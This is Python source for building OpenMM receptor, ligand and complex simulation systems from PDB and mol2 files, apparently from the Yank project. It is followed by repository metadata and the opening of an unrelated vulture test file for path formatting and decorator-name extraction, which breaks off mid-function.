        # Create file-like objects from ffxml contents because ForceField cannot yet read strings.
        from StringIO import StringIO
        ffxml_streams = list()
        for ffxml in self._ffxmls:
            ffxml_streams.append(StringIO(ffxml))

        # Create ForceField, retaining it so the `forcefield` property can return it later.
        forcefield = app.ForceField(*ffxml_streams)
        self._forcefield = forcefield

        # Create System from topology.
        self._system = forcefield.createSystem(self._topology, **self.system_creation_parameters)

        return

    @property
    def system(self):
        """
        Return the SystemBuilder's simtk.openmm.System object.

        The System is created via ForceField.createSystem() on first access and cached;
        a reference to the cached object is returned.

        """
        if self._system is None:
            self._create_system()
        return self._system

    @property
    def natoms(self):
        """
        Return the number of particles in this system.

        Returns
        -------
        natoms : int
           The number of particles in this system.

        """
        return len(self._positions)

    @property
    def topology(self):
        """
        Return the SystemBuilder's OpenMM topology object.

        Returns
        -------
        topology : simtk.openmm.app.Topology
           The topology object containing all atoms in the system.
           A deep copy is returned to avoid accidentally modifying these objects.

        """
        return copy.deepcopy(self._topology)

    @property
    def positions(self):
        """
        Return atomic positions in OpenMM format.

        Returns
        -------
        positions : simtk.unit.Quantity with units compatible with nanometers, wrapping natoms x 3 numpy array
           Atomic positions.
           A deep copy is returned to avoid accidentally modifying these objects.

        """
        return copy.deepcopy(self._positions)

    @property
    def forcefield(self):
        """
        Return the associated ForceField object.

        Returns
        -------
        forcefield : simtk.openmm.app.ForceField
           The ForceField object associated with this class. One is created if it does not yet exist.
           A deep copy is returned to avoid accidentally modifying these objects.
""" return copy.deepcopy(self._forcefield) @property def ffxmls(self): """ Return the list of OpenMM forcefield definition (ffxml) files associated with this SystemBuilder object. Returns ------- ffxmls : list of str The list of OpenMM ffxml file contents associated with this object. A deep copy is returned to avoid accidentally modifying these objects. """ return copy.deepcopy(self._ffxmls) #============================================================================================= # ABSTRACT BIOPOLYMER SYSTEM BUILDER #============================================================================================= class BiopolymerSystemBuilder(SystemBuilder): """ Abstract base class for classes that will read biopolymers. """ __metaclass__ = abc.ABCMeta def __init__(self,ffxml_filenames=None): """ Abstract base class for classes that will read biopolymers. Parameters ---------- """ super(BiopolymerSystemBuilder, self).__init__(ffxml_filenames=ffxml_filenames) return #============================================================================================= # BIOPOLYMER SYSTEM BUILDER FOR PDB FILES #============================================================================================= class BiopolymerPDBSystemBuilder(BiopolymerSystemBuilder): """ BiopolymerPDBSystemBuilder: This class is a subclass of BiopolymerSystemBuilder, and uses a PDB file as input. Currently, it accepts proteins and uses PDBFixer to try to repair issues with the PDB file This class does not currently perform any parameterization. As such, failure to give it appropriate forcefield ffxml(s) will cause it to fail. """ def __init__(self, pdb_filename, chain_ids=None, ffxml_filenames=['amber99sbildn.xml'], pH=7.0): """ Create a biopolymer from a specified PDB file. Parameters ---------- pdb_filename : str PDB filename chain_ids : str, default=None List of chain IDs that should be kept (e.g. 'ACFG'), or None if all are kept. ffxml_filenames : list of str, default=None List of OpenMM ForceField ffxml files used to parameterize the System. pH : float, default 7.0 pH to be used in determining the protonation state of the biopolymer. Examples -------- Create a SystemBuilder for a PDB file. >> from openmmtools import testsystems >> receptor_pdb_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/receptor.pdb") >> receptor = BiopolymerPDBSystemBuilder(receptor_pdb_filename, pH=7.0) >> system = receptor.system >> positions = receptor.positions >> natoms = receptor.natoms """ # Call base constructor. super(BiopolymerPDBSystemBuilder, self).__init__(ffxml_filenames=ffxml_filenames) # Store the desired pH used to assign protonation states. self._pH = pH # Use PDBFixer to add missing atoms and residues and set protonation states appropriately. from pdbfixer import pdbfixer fixer = pdbfixer.PDBFixer(pdb_filename) fixer.findMissingResidues() fixer.findNonstandardResidues() fixer.replaceNonstandardResidues() fixer.findMissingAtoms() fixer.addMissingAtoms() fixer.removeHeterogens(True) fixer.addMissingHydrogens(self._pH) # Keep only the chains the user wants if chain_ids is not None: # TODO: Check correctness of this. n_chains = len(list(fixer.topology.chains())) chains_to_remove = np.setdiff1d(np.arange(n_chains), chain_ids) # TODO: Check if this is robust to weird chain orderings. fixer.removeChains(chains_to_remove) # Store OpenMM topology. self._topology = fixer.topology # Store OpenMM positions. 
        self._positions = fixer.positions

        return

    @property
    def pH(self):
        """
        The pH used to determine the protonation state of the biopolymer.

        Returns
        -------
        pH : float
           The pH that was used to determine the protonation state.

        """
        return self._pH

#=============================================================================================
# ABSTRACT BASE SMALL MOLECULE BUILDER
#=============================================================================================

class SmallMoleculeBuilder(SystemBuilder):
    """
    Concrete base class for SystemBuilders that will handle small molecules given OpenMM positions and topology.
    Parameters may be created by an external tool, if specified.

    This version manages an internal OpenEye OEChem object for convenience.
    Other tools may be supported as well in the future.

    TODO:
    * Allow specification of charge assignment method.
    * Support additional small molecule parameterization methods (e.g. oeante, paramchem, ATB)

    """

    # Loaded OpenEye modules
    oechem = None
    oeiupac = None
    oeomega = None
    oequacpac = None

    def __init__(self, molecule, parameterize='gaff2xml', parameterize_arguments=None, charge=None, molecule_name=None, **kwargs):
        """
        SystemBuilder capable of parameterizing small molecules given OpenMM positions and topology.

        Parameters
        ----------
        molecule : openeye.oechem.OEMol
           The small molecule to be parameterized.
        parameterize : str, optional, default='gaff2xml'
           External tool used to parameterize the molecule. One of [False, 'gaff2xml'].
           If False, tool will not be called.
        parameterize_arguments : dict, optional, default=None
           Dictionary to be passed to parameterization tool.
        charge : int, optional, default=None
           If specified, the appropriate charge state will be selected.

        **kwargs are passed to external parameterization tool

        """
        # Load and license check for all necessary OpenEye libraries
        self._load_verify_openeye()

        # Call the constructor.
        super(SmallMoleculeBuilder, self).__init__(**kwargs)

        # Normalize the molecule.
        molecule = self._normalize_molecule(molecule)

        # Select the desired charge state, if one is specified.
        if charge is not None:
            # Enumerate protonation states and select desired state.
            protonation_states = self._enumerate_states(molecule, type_of_states="protonation")

            # Search through the states for desired charge
            for molecule in protonation_states:
                if self._formal_charge(molecule) == charge:
                    break

            # Throw exception if we are unable to find desired charge.
            if self._formal_charge(molecule) != charge:
                print "enumerateStates did not enumerate a molecule with desired formal charge."
                print "Options are:"
                for molecule in protonation_states:
                    print "%s, formal charge %d" % (molecule.GetTitle(), self._formal_charge(molecule))
                raise RuntimeError("Could not find desired formal charge.")

        # Generate a 3D conformation if we don't have a 3-dimensional molecule.
        if molecule.GetDimension() < 3:
            molecule = self._expand_conformations(molecule, maxconfs=1)

        # Store OpenMM positions and topologies.
        [self._positions, self._topology] = self._oemol_to_openmm(molecule)

        # Parameterize if requested.
        if parameterize:
            if parameterize == 'gaff2xml':
                self._parameterize_with_gaff2xml(molecule, parameterize_arguments)

        return

    def _parameterize_with_gaff2xml(self, molecule, parameterize_arguments=None):
        """
        Parameterize the molecule using gaff2xml, appending the parameters to the set of loaded parameters.

        Parameters
        ----------
        parameterize_arguments : dict, optional, default=None
           Optional kwargs to be passed to gaff2xml.

        """
        # Attempt to import gaff2xml.
        import gaff2xml

        # Change to a temporary working directory.
        # Use an empty dict if no parameterization arguments were given.
        if parameterize_arguments is None:
            parameterize_arguments = dict()

        cwd = os.getcwd()
        tmpdir = tempfile.mkdtemp()
        os.chdir(tmpdir)

        # Write Tripos mol2 file.
        substructure_name = "MOL" # substructure name used in mol2 file
        mol2_filename = self._write_molecule(molecule, filename='tripos.mol2', substructure_name=substructure_name)

        # Run antechamber via gaff2xml to generate parameters.
        # TODO: We need a way to pass the net charge.
        # TODO: Can this structure be simplified?
        if 'charge_method' in parameterize_arguments:
            if 'net_charge' not in parameterize_arguments:
                # Specify formal charge.
                formal_charge = self._formal_charge(molecule)
                parameterize_arguments['net_charge'] = formal_charge
        if parameterize_arguments:
            (gaff_mol2_filename, gaff_frcmod_filename) = gaff2xml.utils.run_antechamber(self._molecule_name, mol2_filename, **parameterize_arguments)
        else:
            (gaff_mol2_filename, gaff_frcmod_filename) = gaff2xml.utils.run_antechamber(self._molecule_name, mol2_filename)

        # Write out the ffxml file from gaff2xml.
        ffxml_filename = "molecule.ffxml"
        print "tripos mol2 filename: %s" % mol2_filename # DEBUG
        print "gaff mol2 filename: %s" % gaff_mol2_filename # DEBUG
        print "gaff frcmod filename: %s" % gaff_frcmod_filename # DEBUG
        gaff2xml.utils.create_ffxml_file(gaff_mol2_filename, gaff_frcmod_filename, ffxml_filename)

        # Append the ffxml file to loaded parameters.
        self._append_ffxmls([ffxml_filename])

        # Restore working directory.
        os.chdir(cwd)

        # Clean up temporary working directory.
        for filename in os.listdir(tmpdir):
            file_path = os.path.join(tmpdir, filename)
            try:
                if os.path.isfile(file_path):
                    os.unlink(file_path)
            except Exception, e:
                print e

        return

    def _write_molecule(self, molecule, filename=None, format=None, preserve_atomtypes=False, substructure_name=None):
        """Write the given OpenEye molecule to a file.

        Parameters
        ----------
        molecule : openeye.oechem.OEMol
           The molecule to be written to file (will not be changed).
        filename : str, optional, default=None
           The name of the file to be written, or None if a temporary file is to be created.
        format : OEFormat, optional, default=None
           The format of the file to be written (an OEFormat constant).
        preserve_atomtypes : bool, optional, default=False
           If True, atom types will not be converted before writing.
        substructure_name : str, optional, default=None
           If specified, mol2 substructure name will be set to specified name.

        Returns
        -------
        filename : str
           The name of the file written.

        """
        if filename is None:
            file = tempfile.NamedTemporaryFile(delete=False)
            filename = file.name
            file.close() # close the file so we can open it again

        # Make a copy of the molecule so it will not be changed.
        molecule = self.oechem.OEMol(molecule)

        # Open the output stream
        ostream = self.oechem.oemolostream(filename)

        # Select the format.
        if format:
            ostream.SetFormat(format)

        # Define internal function for writing multiple conformers to an output stream.
        def write_all_conformers(ostream, molecule):
            # write all conformers of each molecule
            for conformer in molecule.GetConfs():
                if preserve_atomtypes:
                    self.oechem.OEWriteMol2File(ostream, conformer)
                else:
                    self.oechem.OEWriteConstMolecule(ostream, conformer)
            return

        # If 'molecule' is actually a list of molecules, write them all.
        if type(molecule) == type(list()):
            for individual_molecule in molecule:
                write_all_conformers(ostream, individual_molecule)
        else:
            write_all_conformers(ostream, molecule)

        # Close the stream.
        ostream.close()

        # Modify substructure name if requested.
        if substructure_name:
            self._modify_substructure_name(filename, substructure_name)

        return filename

    def _modify_substructure_name(self, mol2file, name):
        """Replace the substructure name (subst_name) in a mol2 file.

        ARGUMENTS
          mol2file (string) - name of the mol2 file to modify
          name (string) - new substructure name

        NOTES
          This is useful because the OpenEye tools leave this name set to <0>.
          The transformation is only applied to the first molecule in the mol2 file.

        TODO
          This function is still difficult to read. It should be rewritten to be comprehensible by humans.
          Check again to see if there is OpenEye functionality to write the substructure name correctly.

        """
        # Read mol2 file.
        file = open(mol2file, 'r')
        text = file.readlines()
        file.close()

        # Find the atom records.
        atomsec = []
        ct = 0
        while text[ct].find('<TRIPOS>ATOM')==-1:
            ct+=1
        ct+=1
        atomstart = ct
        while text[ct].find('<TRIPOS>BOND')==-1:
            ct+=1
        atomend = ct

        atomsec = text[atomstart:atomend]
        outtext=text[0:atomstart]
        repltext = atomsec[0].split()[7] # mol2 file uses space delimited, not fixed-width

        # Replace substructure name.
        for line in atomsec:
            # If we blindly search and replace, we'll tend to clobber stuff, as the subst_name might be "1" or something lame like that that will occur all over.
            # If it only occurs once, just replace it.
            if line.count(repltext)==1:
                outtext.append( line.replace(repltext, name) )
            else:
                # Otherwise grab the string left and right of the subst_name and sandwich the new subst_name in between.
                # This can probably be done easier in Python 2.5 with partition, but 2.4 is still used some places.
                # Loop through the line and tag locations of every non-space entry
                blockstart=[]
                ct=0
                c=' '
                for ct in range(len(line)):
                    lastc = c
                    c = line[ct]
                    if lastc.isspace() and not c.isspace():
                        blockstart.append(ct)
                line = line[0:blockstart[7]] + line[blockstart[7]:].replace(repltext, name, 1)
                outtext.append(line)

        # Append rest of file.
        for line in text[atomend:]:
            outtext.append(line)

        # Write out modified mol2 file, overwriting old one.
        file = open(mol2file,'w')
        file.writelines(outtext)
        file.close()

        return

    def _oemol_to_openmm(self, molecule):
        """Extract OpenMM positions and topologies from an OpenEye OEMol molecule.

        Parameters
        ----------
        molecule : openeye.oechem.OEMol
           The molecule from which positions and topology are to be extracted.
           NOTE: This must be a Tripos format mol2 file, not a GAFF format file.

        Returns
        -------
        positions : simtk.unit.Quantity with units compatible with nanometers, natoms x 3
           The atomic positions.
        topology : simtk.openmm.app.Topology
           OpenMM Topology object for the small molecule.

        """
        # Change to a temporary working directory.
        cwd = os.getcwd()
        tmpdir = tempfile.mkdtemp()
        os.chdir(tmpdir)

        # Write a Tripos mol2 file to a temporary file.
        substructure_name = "MOL" # substructure name used in mol2 file
        mol2_filename = 'molecule.mol2'
        self._write_molecule(molecule, filename=mol2_filename, substructure_name=substructure_name)

        # Read the mol2 file in MDTraj.
        import mdtraj
        mdtraj_molecule = mdtraj.load(mol2_filename)
        positions = mdtraj_molecule.openmm_positions(0)
        topology = mdtraj_molecule.top.to_openmm()

        # Restore working directory.
        os.chdir(cwd)

        # Clean up temporary working directory.
        for filename in os.listdir(tmpdir):
            file_path = os.path.join(tmpdir, filename)
            try:
                if os.path.isfile(file_path):
                    os.unlink(file_path)
            except Exception, e:
                print e

        # Return OpenMM format positions and topology.
        return [positions, topology]

    def _normalize_molecule(self, molecule, set_name_to_iupac=True):
        """Normalize the molecule by checking aromaticity, adding explicit hydrogens, and renaming by IUPAC name.

        Parameters
        ----------
        molecule : openeye.oechem.OEMol
           The molecule to be normalized.
        set_name_to_iupac : bool, optional, default=True
           If True, the molecule title will be set to the IUPAC name.

        Returns
        -------
        normalized_molecule : openeye.oechem.OEMol
           The normalized molecule.

        """
        # Make a copy of the molecule.
        normalized_molecule = self.oechem.OEMol(molecule)

        # Find ring atoms and bonds
        self.oechem.OEFindRingAtomsAndBonds(normalized_molecule)

        # Assign aromaticity.
        self.oechem.OEAssignAromaticFlags(normalized_molecule, self.oechem.OEAroModelOpenEye)

        # Add hydrogens.
        self.oechem.OEAddExplicitHydrogens(normalized_molecule)

        if set_name_to_iupac:
            # Set title to IUPAC name.
            name = self.oeiupac.OECreateIUPACName(normalized_molecule)
            normalized_molecule.SetTitle(name)

        return normalized_molecule

    def _expand_conformations(self, molecule, maxconfs=None, threshold=None, include_original=False, torsionlib=None, verbose=False, strictTyping=None, strictStereo=True):
        """Enumerate conformations of the molecule with OpenEye's Omega after normalizing molecule.

        Parameters
        ----------
        molecule : openeye.oechem.OEMol
           Molecule to enumerate conformations for.
        include_original (boolean) - if True, original conformation is included (default: False)
        maxconfs (integer) - if set to an integer, limits the maximum number of conformations to generate -- maximum of 120 (default: None)
        threshold (real) - threshold in RMSD (in Angstroms) for retaining conformers -- lower thresholds retain more conformers (default: None)
        torsionlib (string) - if a path to an Omega torsion library is given, this will be used instead (default: None)
        verbose (boolean) - if True, omega will print extra information
        strictTyping (boolean) -- if specified, pass option to SetStrictAtomTypes for Omega to control whether related MMFF types are allowed to be substituted for exact matches.
        strictStereo (boolean) -- if specified, pass option to SetStrictStereo; otherwise use default.

        Returns
        -------
        expanded_molecule : openeye.oechem.OEMol
           Molecule with expanded conformations.

        """
        # Copy molecule.
        expanded_molecule = self.oechem.OEMol(molecule)

        # Initialize Omega.
        omega = self.oeomega.OEOmega()
        if strictStereo is not None: omega.SetStrictStereo(strictStereo) # Fail if stereochemistry is not specified.
        if strictTyping is not None: omega.SetStrictAtomTypes(strictTyping) # Fail if any atom does not have a valid MMFF atom type.
        if include_original is not None: omega.SetIncludeInput(include_original) # Include input
        if torsionlib is not None: omega.SetTorsionLibrary(torsionlib)
        if maxconfs is not None: omega.SetMaxConfs(maxconfs) # Limit the number of conformations generated.
        omega(expanded_molecule) # Generate conformation.

        return expanded_molecule

    def _formal_charge(self, molecule):
        """Find the net charge of a molecule.

        Parameters
        ----------
        molecule : OEMol
           the molecule whose formal charge is to be determined

        Returns
        -------
        int
           The formal charge of the molecule

        """
        mol_copy = self.oechem.OEMol(molecule)
        self.oechem.OEFormalPartialCharges(mol_copy)
        return int(round(self.oechem.OENetCharge(mol_copy)))

    def _enumerate_states(self, molecules, type_of_states="protonation", consider_aromaticity=True, maxstates=200, verbose=False):
        """Enumerate protonation or tautomer states for a list of molecules.
        Parameters
        ----------
        molecules : (OEMol or list of OEMol)
           molecule(s) for which states are to be enumerated
        type_of_states : str, optional
           type of states to expand -- 'protonation' or 'tautomer' (default: 'protonation')
        consider_aromaticity - bool, optional
           if True, aromaticity of the states will be evaluated. (default : True)
        verbose - bool, optional
           if True, will print out debug output (default : False)

        Returns
        -------
        list of OEMol
           molecules in different protonation or tautomeric states

        """
        # If 'molecules' is not a list, promote it to a list.
        if type(molecules) != type(list()):
            molecules = [molecules]

        # Check input arguments.
        if not ((type_of_states == "protonation") or (type_of_states == "tautomer")):
            raise ValueError("'type_of_states' argument must be either 'protonation' or 'tautomer' -- instead got '%s'" % type_of_states)

        # Create an internal output stream to expand states into.
        ostream = self.oechem.oemolostream()
        ostream.openstring()
        ostream.SetFormat(self.oechem.OEFormat_SDF)

        # Default parameters.
        only_count_states = False # enumerate states, don't just count them

        # Enumerate states for each molecule in the input list.
        states_enumerated = 0
        for molecule in molecules:
            if verbose: print "Enumerating states for molecule %s." % molecule.GetTitle()

            # Dump enumerated states to output stream (ostream).
            if type_of_states == "protonation":
                # Create a functor associated with the output stream.
                functor = self.oequacpac.OETyperMolFunction(ostream, consider_aromaticity, False, maxstates)
                # Enumerate protonation states.
                if verbose: print "Enumerating protonation states..."
                states_enumerated += self.oequacpac.OEEnumerateFormalCharges(molecule, functor, verbose)
            elif type_of_states == "tautomer":
                # Create a functor associated with the output stream.
                functor = self.oequacpac.OETautomerMolFunction(ostream, consider_aromaticity, False, maxstates) # TODO: deprecated
                # Enumerate tautomeric states.
                if verbose: print "Enumerating tautomer states..."
                states_enumerated += self.oequacpac.OEEnumerateTautomers(molecule, functor, verbose)
        if verbose: print "Enumerated a total of %d states." % states_enumerated

        # Collect molecules from output stream into a list.
        states = list()
        if states_enumerated > 0:
            state = self.oechem.OEMol()
            istream = self.oechem.oemolistream()
            istream.openstring(ostream.GetString())
            istream.SetFormat(self.oechem.OEFormat_SDF)
            while self.oechem.OEReadMolecule(istream, state):
                states.append(self.oechem.OEMol(state)) # append a copy

        # Return the list of expanded states as a Python list of OEMol() molecules.
        return states

    def _load_verify_openeye(self, oechemlicensepath=None):
        """Loads required OpenEye libraries and checks licenses

        Parameters
        ----------
        oechemlicensepath : str, optional, default=None
           OpenEye license path to use, or None if environment variables are to be used.

        Raises
        ------
        RuntimeError
           If OE_LICENSE is not found as an environment variable
           If a valid license is missing

        Notes
        -----
        Needs to be run before any of the other functions to ensure OpenEye libraries are accessible.

        """
        # Don't do anything if we've already imported OpenEye toolkit.
        if self.oechem: return

        try:
            # Import the OpenEye toolkit components.
            from openeye import oechem # For chemical objects
            from openeye import oeiupac # For IUPAC conversion
            from openeye import oeomega # For conformer generation
            from openeye import oequacpac # For pKa estimations
        except Exception as e:
            raise Exception("Could not import `openeye` library. Make sure OpenEye Python Toolkit is installed and on PYTHONPATH.")

        import os
        if oechemlicensepath is not None:
            os.environ['OE_LICENSE'] = oechemlicensepath

        try:
            os.environ['OE_LICENSE'] # See if license path is set.
        except KeyError:
            raise RuntimeError("Environment variable OE_LICENSE needs to be set.")

        if not oechem.OEChemIsLicensed(): # Check for OEchem TK license.
            raise RuntimeError("No valid license available for OEChem TK.")

        if not oeiupac.OEIUPACIsLicensed(): # Check for Lexichem TK license.
            raise RuntimeError("No valid license available for Lexichem TK.")

        if not oeomega.OEOmegaIsLicensed(): # Check for Omega TK license.
            raise RuntimeError("No valid license for Omega TK.")

        if not oequacpac.OEQuacPacIsLicensed(): # Check for Quacpac TK license.
            raise RuntimeError("No valid license for Quacpac TK.")

        # Attach libraries to the instance to only load and check them once at initialization.
        self.oechem = oechem
        self.oeiupac = oeiupac
        self.oeomega = oeomega
        self.oequacpac = oequacpac

        return

#=============================================================================================
# SMALL MOLECULE SYSTEM BUILDER FOR MOL2 FILES
#=============================================================================================

class Mol2SystemBuilder(SmallMoleculeBuilder):
    """
    Create a system from a small molecule specified in a Tripos mol2 file.
    """

    def __init__(self, mol2_filename, **kwargs):
        """
        Create a system from a Tripos mol2 file.

        Parameters
        ----------
        mol2_filename : str
           Small molecule coordinate file in Tripos mol2 format.

        Other arguments are inherited from SmallMoleculeBuilder.

        Examples
        --------
        Create a SystemBuilder from a ligand mol2 file, using default parameterization scheme.
        >> from openmmtools import testsystems
        >> ligand_mol2_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/ligand.tripos.mol2")
        >> ligand = Mol2SystemBuilder(ligand_mol2_filename, charge=0)
        >> system = ligand.system
        >> positions = ligand.positions
        >> natoms = ligand.natoms

        """
        # Initialize the OpenEye toolkit.
        self._load_verify_openeye()

        # Open an input stream
        istream = self.oechem.oemolistream()
        istream.open(mol2_filename)

        # Prepare a molecule object
        molecule = self.oechem.OEMol()

        # Read the molecule
        self.oechem.OEReadMolecule(istream, molecule)

        # Close stream
        istream.close()

        # Initialize small molecule parameterization engine.
        super(Mol2SystemBuilder, self).__init__(molecule, **kwargs)

        return

#=============================================================================================
# SYSTEM BUILDER FOR COMBINING RECEPTOR AND LIGAND INTO A COMPLEX
#=============================================================================================

class ComplexSystemBuilder(SystemBuilder):

    def __init__(self, ligand, receptor, remove_ligand_overlap=False):
        """
        Create a new SystemBuilder for a complex of a given ligand and receptor, keeping track of which atoms belong to which.

        Parameters
        ----------
        ligand : SystemBuilder
           The SystemBuilder representing the ligand
        receptor : SystemBuilder
           The SystemBuilder representing the receptor
        remove_ligand_overlap : bool, optional, default=False
           If True, will translate ligand to not overlap with receptor atoms.

        Properties
        ----------
        ligand_atoms : list of int
           List of atoms representing the ligand.
        receptor_atoms : list of int
           List of atoms representing the receptor.

        Examples
        --------
        Create a ComplexSystemBuilder from a protein PDB file and a ligand mol2 file.
>> from openmmtools import testsystems >> receptor_pdb_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/receptor.pdb") >> ligand_mol2_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/ligand.tripos.mol2") >> receptor = BiopolymerPDBSystemBuilder(receptor_pdb_filename, pH=7.0) >> ligand = Mol2SystemBuilder(ligand_mol2_filename, charge=0) >> complex = ComplexSystemBuilder(ligand, receptor, remove_ligand_overlap=True) >> system = complex.system >> positions = complex.positions >> ligand_atoms = complex.ligand_atoms >> receptor_atoms = complex.receptor_atoms >> natoms = complex.natoms """ # Call base class constructor. super(ComplexSystemBuilder, self).__init__() # Append ffxml files. self._ffxmls = list() self._ffxmls += receptor.ffxmls self._ffxmls += ligand.ffxmls # Concatenate topologies and positions. from simtk.openmm import app model = app.modeller.Modeller(receptor.topology, receptor.positions) model.add(ligand.topology, ligand.positions) self._topology = model.topology self._positions = model.positions # Store indices for receptor and ligand. self._receptor_atoms = range(receptor.natoms) self._ligand_atoms = range(receptor.natoms, receptor.natoms + ligand.natoms) # Modify ligand coordinates to not overlap with receptor. if remove_ligand_overlap: self._remove_ligand_overlap() return def _remove_ligand_overlap(self): """ Translate the ligand so that it is not overlapping with the receptor. Description ----------- The bounding sphere of the ligand and receptor are computed, and the ligand translated along the x-direction to not overlap with the protein. TODO: * This is not guaranteed to work for periodic systems. """ import mdtraj as md # Create an mdtraj Topology of the complex from OpenMM Topology object. mdtraj_complex_topology = md.Topology.from_openmm(self._topology) # Create an mdtraj instance of the complex. # TODO: Fix this when mdtraj can deal with OpenMM units. positions_in_mdtraj_format = np.array(self._positions / units.nanometers) mdtraj_complex = md.Trajectory(positions_in_mdtraj_format, mdtraj_complex_topology) # Compute centers of receptor and ligand. receptor_center = mdtraj_complex.xyz[0][self._receptor_atoms,:].mean(0) ligand_center = mdtraj_complex.xyz[0][self._ligand_atoms,:].mean(0) # Count number of receptor and ligand atoms. nreceptor_atoms = len(self._receptor_atoms) nligand_atoms = len(self._ligand_atoms) # Compute max radii of receptor and ligand. receptor_radius = (((mdtraj_complex.xyz[0][self._receptor_atoms,:] - np.tile(receptor_center, (nreceptor_atoms,1))) ** 2.).sum(1) ** 0.5).max() ligand_radius = (((mdtraj_complex.xyz[0][self._ligand_atoms,:] - np.tile(ligand_center, (nligand_atoms,1))) ** 2.).sum(1) ** 0.5).max() # Translate ligand along x-axis from receptor center with 5% clearance. mdtraj_complex.xyz[0][self._ligand_atoms,:] += np.array([1.0, 0.0, 0.0]) * (receptor_radius + ligand_radius) * 1.05 - ligand_center + receptor_center # Extract updated system positions. 
        self._positions = mdtraj_complex.openmm_positions(0)

        return

    @property
    def ligand_atoms(self):
        return copy.deepcopy(self._ligand_atoms)

    @property
    def receptor_atoms(self):
        return copy.deepcopy(self._receptor_atoms)

#=============================================================================================
# TEST CODE
#=============================================================================================

def test_alchemy():
    import os
    import simtk.unit as unit
    import simtk.openmm as openmm
    import numpy as np
    import simtk.openmm.app as app
    import alchemy

    # Create SystemBuilder objects.
    from openmmtools import testsystems
    receptor_pdb_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/receptor.pdb")
    ligand_mol2_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/ligand.tripos.mol2")
    receptor = BiopolymerPDBSystemBuilder(receptor_pdb_filename, pH=7.0)
    ligand = Mol2SystemBuilder(ligand_mol2_filename, charge=0)
    complex = ComplexSystemBuilder(ligand, receptor, remove_ligand_overlap=True)

    timestep = 2 * unit.femtoseconds # timestep
    temperature = 300.0 * unit.kelvin # simulation temperature
    collision_rate = 20.0 / unit.picoseconds # Langevin collision rate
    minimization_tolerance = 10.0 * unit.kilojoules_per_mole / unit.nanometer
    minimization_steps = 20
    plat = "CPU"
    i = 2 # index into systembuilders below: simulate the complex
    platform = openmm.Platform.getPlatformByName(plat)

    systembuilders = [ligand, receptor, complex]
    receptor_atoms = complex.receptor_atoms
    ligand_atoms = complex.ligand_atoms

    factory = alchemy.AbsoluteAlchemicalFactory(systembuilders[i].system, ligand_atoms=ligand_atoms)
    protocol = factory.defaultComplexProtocolImplicit()
    systems = factory.createPerturbedSystems(protocol)
    integrator_interacting = openmm.LangevinIntegrator(temperature, collision_rate, timestep)

    # Test an alchemical intermediate and an unperturbed system:
    fully_interacting = app.Simulation(systembuilders[i].topology, systems[0], integrator_interacting, platform=platform)
    fully_interacting.context.setPositions(systembuilders[i].positions)
    fully_interacting.minimizeEnergy(tolerance=10*unit.kilojoule_per_mole)
    fully_interacting.reporters.append(app.PDBReporter('fully_interacting.pdb', 10))
    for j in range(10):
        print str(j)
        fully_interacting.step(100)
    del fully_interacting

    for p in range(1, len(systems)):
        print "now simulating " + str(p)
        integrator_partialinteracting = openmm.LangevinIntegrator(temperature, collision_rate, timestep)
        partially_interacting = app.Simulation(systembuilders[i].topology, systems[p], integrator_partialinteracting, platform=platform)
        partially_interacting.context.setPositions(systembuilders[i].positions)
        partially_interacting.minimizeEnergy(tolerance=10*unit.kilojoule_per_mole)
        partially_interacting.reporters.append(app.PDBReporter('partial_interacting'+str(p)+'.pdb', 10))
        for k in range(10):
            print str(k)
            partially_interacting.step(100)
        del partially_interacting

#=============================================================================================
# MAIN AND TESTS
#=============================================================================================

if __name__ == "__main__":
    # Run doctests.
    import doctest
    doctest.testmod()

    # Run test.
    test_alchemy()
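#=============================================================================================
# EDITORIAL EXAMPLE (not part of the original module)
#=============================================================================================
# The sketch below is an illustrative usage example added for clarity. It mirrors the
# docstring examples above and assumes the same environment they do (openmmtools test data,
# the OpenEye toolkit, pdbfixer and gaff2xml installed); it is not a definitive workflow.

def example_build_complex():
    """Minimal sketch: build receptor, ligand, and complex SystemBuilders."""
    from openmmtools import testsystems
    receptor_pdb = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/receptor.pdb")
    ligand_mol2 = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/ligand.tripos.mol2")
    receptor = BiopolymerPDBSystemBuilder(receptor_pdb, pH=7.0)
    ligand = Mol2SystemBuilder(ligand_mol2, charge=0)
    complex_builder = ComplexSystemBuilder(ligand, receptor, remove_ligand_overlap=True)
    # The System object is created lazily, on first access, via ForceField.createSystem().
    print "Complex has %d atoms (%d receptor, %d ligand)" % (
        complex_builder.natoms, len(complex_builder.receptor_atoms), len(complex_builder.ligand_atoms))
    return complex_builder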
luirink/yank
Yank/systembuilder.py
Python
lgpl-3.0
44,764
[ "MDTraj", "OpenMM" ]
98e90d9c73f510e8c1454119a7a741170373441a3c96662822249bd93fc60be6
import ast import os import pathlib import pytest from vulture import utils class TestFormatPath: @pytest.fixture def tmp_cwd(self, tmp_path, monkeypatch): cwd = tmp_path / "workingdir" cwd.mkdir() monkeypatch.chdir(cwd) return cwd def test_relative_inside(self): filepath = pathlib.Path("testfile.py") formatted = utils.format_path(filepath) assert formatted == filepath assert not formatted.is_absolute() def test_relative_outside(self, tmp_cwd): filepath = pathlib.Path(os.pardir) / "testfile.py" formatted = utils.format_path(filepath) assert formatted == filepath assert not formatted.is_absolute() def test_absolute_inside(self, tmp_cwd): filepath = tmp_cwd / "testfile.py" formatted = utils.format_path(filepath) assert formatted == pathlib.Path("testfile.py") assert not formatted.is_absolute() def test_absolute_outside(self, tmp_cwd): filepath = (tmp_cwd / os.pardir / "testfile.py").resolve() formatted = utils.format_path(filepath) assert formatted == filepath assert formatted.is_absolute() def check_decorator_names(code, expected_names): decorator_names = [] def visit_FunctionDef(node): for decorator in node.decorator_list: decorator_names.append(utils.get_decorator_name(decorator)) node_visitor = ast.NodeVisitor() node_visitor.visit_AsyncFunctionDef = visit_FunctionDef node_visitor.visit_ClassDef = visit_FunctionDef node_visitor.visit_FunctionDef = visit_FunctionDef node_visitor.visit(ast.parse(code)) assert expected_names == decorator_names def test_get_decorator_name_simple(): code = """\ @foobar def hoo(): pass """ check_decorator_names(code, ["@foobar"]) def test_get_decorator_name_call(): code = """\ @xyz() def bar(): pass """ check_decorator_names(code, 